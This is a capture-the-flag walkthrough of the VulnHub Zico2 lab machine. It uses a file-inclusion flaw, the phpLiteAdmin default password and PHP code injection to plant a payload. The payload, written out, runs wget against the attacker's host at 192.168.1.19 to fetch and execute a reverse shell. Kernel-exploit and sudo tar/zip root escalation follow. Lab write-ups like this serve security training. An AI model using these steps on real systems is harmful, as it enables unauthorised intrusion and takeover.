Thursday, December 13, 2018

Zico 2


ZICO 2

- Layout for this exercise:




1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Zico2.

- Zico2 can be downloaded from here:

https://www.vulnhub.com/entry/zico2-1,210/


- Once downloaded and extracted with VMware:





2 - ENUMERATION

- Looking for zico2's IP:





- Scanning with Nmap:




- Dirbusting the web server we find an interesting folder dbadmin:






- Launching dirsearch.py we also discover a view.php:










- Let's explore both view.php and /dbadmin.


- Connecting to the web server:




- Scrolling down and clicking about the "tools":






- So view.php leads us to try a Local File Inclusion that can exploit a Directory Path Traversal:




- Now it's time to explore dbadmin:




- Clicking test_db.php:




- Default password for phpLiteAdmin is admin:

https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/




- It is possible to create new databases:





3 - EXPLOITATION - REMOTE PHP CODE INJECTION


- Looking for phpLiteAdmin vulnerabilities there is an exploit for Remote PHP Code Injection, what allows to inject code remotely to the server:




- Reading the first lines of the 24044.txt exploit:




- Going to exploit-db:







- Following instructions let's create hack.php:











- Adding a testing table prueba:




- Entering the Default Value <?php phpinfo()?>:







- Using the LFI from view.php we can successfully run the recently created database and check that the exploit works:






- Why not taking advantage of this Remote PHP Code Injection exploit to upload a shellcode and spawn a reverse shellcode?

- msfvenom helps to create our shellcode:




- Giving execution permissions:




- Setting a meterpreter session:




- Creating table 1 in database /usr/databases/hack.php:




- Now, it is important to analyze in detail the Default Value to be entered at Field 1:

  • system() -> executes an external program and displays the output
  • cd /tmp -> changing to writable folder /tmp
  • wget http://192.168.1.19:8000/myshell  -> transferring the exploit from Kali to Zico2
  • chmod 755 -> giving execution permissions to the exploit
  • ./myshell -> running the exploit












- view.php? helps us to run the exploit remotely:




- As a consequence a meterpreter session is achieved:








- Getting a shell:





4 - PRIVILEGE ESCALATION

- Improving the shell:




- Let's explore two ways for Privilege Escalation:


4.1 - Kernel exploitation

- The kernel is vulnerable to this exploit, what allows Local Privilege Escalation:

www.exploit-db.com/exploits/33589








- Copy+Pasting the C program vnik.c to our local machine Kali:






- Transferring vnik.c from Kali to Zico2:






- Compiling vnik.c according to the instructions:




- Running vnik a root shell is achieved:





4.2 - Abusing tar and zip

- Listing /home/zico:




- Going to /wordpress:




- Reading wp-config.php we discover interesting credentials for user zico:






- Using these credentials:




- zico is a sudoer able to run /bin/tar and /usr/bin/zip as a root:




- tar and zip are able to run external commands supplied on the command line with the purpose of Privilege Escalation:

http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/

https://www.gnu.org/software/tar/manual/html_section/tar_29.html


- For instance tar can be used to spawn a root shell in this way:







- In a similar way zip can be used to spawn a root shell:








5 - CAPTURING THE FLAG

- Inside the /root  folder we can read the file flag.txt: